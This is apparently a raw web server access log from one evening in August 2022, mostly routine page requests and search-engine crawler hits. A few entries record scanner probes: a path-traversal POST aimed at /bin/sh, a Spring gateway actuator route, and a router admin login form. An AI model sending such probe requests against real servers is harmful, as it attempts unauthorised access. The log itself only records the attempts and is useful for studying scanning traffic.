0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 17:07:03 +0200	POST / HTTP/1.1	404	456	-	Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 17:07:14 +0200	POST / HTTP/1.1	404	456	-	Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 17:09:59 +0200	GET / HTTP/1.1	200	95670	-	-
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 17:59:43 +0200	GET /hddvd/123564.html HTTP/1.1	404	452	https://www.baidu.com/s?wd=gysdezx.cn	Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 18:44:15 +0200	GET / HTTP/1.1	200	5091	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 18:50:50 +0200	GET / HTTP/1.1	200	95670	-	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 18:56:03 +0200	GET / HTTP/1.0	200	95546	-	-
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 19:32:19 +0200	POST /cgi-bin/../../../../bin/sh HTTP/1.1	400	488	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 19:46:35 +0200	GET / HTTP/1.0	200	95541	-	-
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 20:03:17 +0200	GET http://www.example.com HTTP/1.1	400	-	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36A
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 20:17:31 +0200	GET /2020_12_21_vipex_access.log.1.html HTTP/1.1	200	31605	-	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.79 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 20:27:42 +0200	GET / HTTP/1.1	200	5091	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 20:41:56 +0200	GET / HTTP/1.1	200	5091	-	Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 21:10:05 +0200	GET /actuator/gateway/routes HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 21:37:52 +0200	GET /2021_01_12_vipex_access.log.1.html HTTP/1.1	200	42825	-	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.79 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 21:39:12 +0200	GET http://example.com/ HTTP/1.1	200	5089	-	Go-http-client/1.1
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 21:44:59 +0200	GET /dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1	404	456	-	Go-http-client/1.1
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 21:45:01 +0200	POST /dns-query HTTP/1.1	404	456	-	Go-http-client/1.1
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 21:45:04 +0200	GET /query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1	404	456	-	Go-http-client/1.1
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 21:45:05 +0200	POST /query HTTP/1.1	404	456	-	Go-http-client/1.1
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 21:45:07 +0200	GET /resolve?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1	404	456	-	Go-http-client/1.1
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 21:45:10 +0200	POST /resolve HTTP/1.1	404	456	-	Go-http-client/1.1
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 21:45:12 +0200	GET /?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1	200	5091	-	Go-http-client/1.1
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 21:45:14 +0200	POST / HTTP/1.1	404	456	-	Go-http-client/1.1
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 22:04:39 +0200	GET /2021_12_01_vipex_access.log.1.html HTTP/1.1	200	33868	-	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.79 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 22:14:42 +0200	GET / HTTP/1.1	200	95670	-	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 22:15:40 +0200	GET /robots.txt HTTP/1.1	404	456	-	-
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 22:15:40 +0200	GET /.well-known/security.txt HTTP/1.1	404	456	-	-
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 22:21:02 +0200	POST /boaform/admin/formLogin HTTP/1.1	404	456	http://91.223.222.117:80/admin/login.asp	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 22:58:13 +0200	GET /2020_11_13_vipex_access.log.1.html HTTP/1.1	200	31552	-	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.79 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Thu, 18 Aug 2022 23:32:31 +0200	GET /2021_08_12_vipex_access.log.1.html HTTP/1.1	200	56503	-	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.79 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)